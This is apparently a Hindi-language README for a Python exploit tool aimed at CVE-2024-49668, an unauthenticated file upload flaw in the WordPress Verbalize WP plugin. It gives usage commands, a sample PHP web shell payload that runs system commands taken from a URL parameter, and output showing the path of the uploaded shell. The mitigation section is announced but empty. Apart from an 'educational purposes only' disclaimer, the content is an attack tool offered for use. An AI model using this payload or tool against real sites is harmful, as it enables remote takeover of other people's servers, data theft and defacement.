
WordPress Verbalize WP plugin <= 1.0 - मनमानी फ़ाइल अपलोड भेद्यता
CVE-2024-49668 WordPress Verbalize WP प्लगइन के संस्करण 1.0 और उससे नीचे में एक गंभीर कमज़ोरी है। यह कमज़ोरी बिना प्रमाणीकरण के हमलावरों को वेब सर्वर में मनमानी फ़ाइलें, जिनमें वेब शेल भी शामिल हैं, अपलोड करने की अनुमति देती है। यह समस्या फ़ाइल अपलोड के दौरान अपर्याप्त इनपुट सत्यापन और फ़ाइल प्रकार प्रतिबंधों के कारण उत्पन्न होती है।
यह Python स्क्रिप्ट Verbalize WP प्लगइन का उपयोग करके लक्ष्य WordPress साइट पर एक शेल फ़ाइल अपलोड करने के लिए CVE-2024-49668 कमज़ोरी का शोषण करती है।
readme.txt में प्लगइन संस्करण की जाँच करके लक्ष्य साइट की कमज़ोरी की पुष्टि करती है।requests लाइब्रेरीआवश्यक लाइब्रेरी को pip का उपयोग करके स्थापित करें:
pip install requests
usage:
CVE-2024-49668.py [-h] -u URL [-s SHELL]
WordPress साइट पर POST अनुरोध निष्पादित करें।
options:
-h, --help यह सहायता संदेश दिखाएँ और बाहर निकलें
-u, --url URL लक्ष्य URL
-s, --shell SHELL अपलोड करने के लिए शेल कोड
डिफ़ॉल्ट रूप से, स्क्रिप्ट एक PHP शेल अपलोड करेगी जो phpinfo() निष्पादित करती है।
python CVE-2024-49668.py -u http://target.com
आप अपलोड करने के लिए एक कस्टम PHP शेल कोड भी निर्दिष्ट कर सकते हैं:
python CVE-2024-49668.py -u http://target.com -s "<?php system($_GET['cmd']); ?>"
साइट कमज़ोर है। संस्करण 1.0 का शोषण किया जा रहा है। फ़ाइल अपलोड की जा रही है...
Shell path: /wp-content/uploads/audio-text/4091/audio-demo.php
Exploit By: Nxploit, Khaled ALenazi
CVE-2024-49668 कमज़ोरी हमलावरों को दुर्भावनापूर्ण फ़ाइलें अपलोड करके लक्ष्य सर्वर पर पूर्ण नियंत्रण प्राप्त करने में सक्षम बनाती है। इस कमज़ोरी का शोषण करने से डेटा उल्लंघन, अनधिकृत पहुँच, और वेबसाइट के संभावित विरूपण सहित गंभीर परिणाम हो सकते हैं।
अपनी WordPress साइट को इस कमज़ोरी से बचाने के लिए, निम्नलिखित अनुशंसित है:
यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है। मालिक से स्पष्ट अनुमति के बिना वेबसाइटों के विरुद्ध इस उपकरण का अनधिकृत उपयोग अवैध है। लेखक इस उपकरण द्वारा किए गए किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
2025-03-22 को Nxploited , Khaled alenazi द्वारा बनाया गया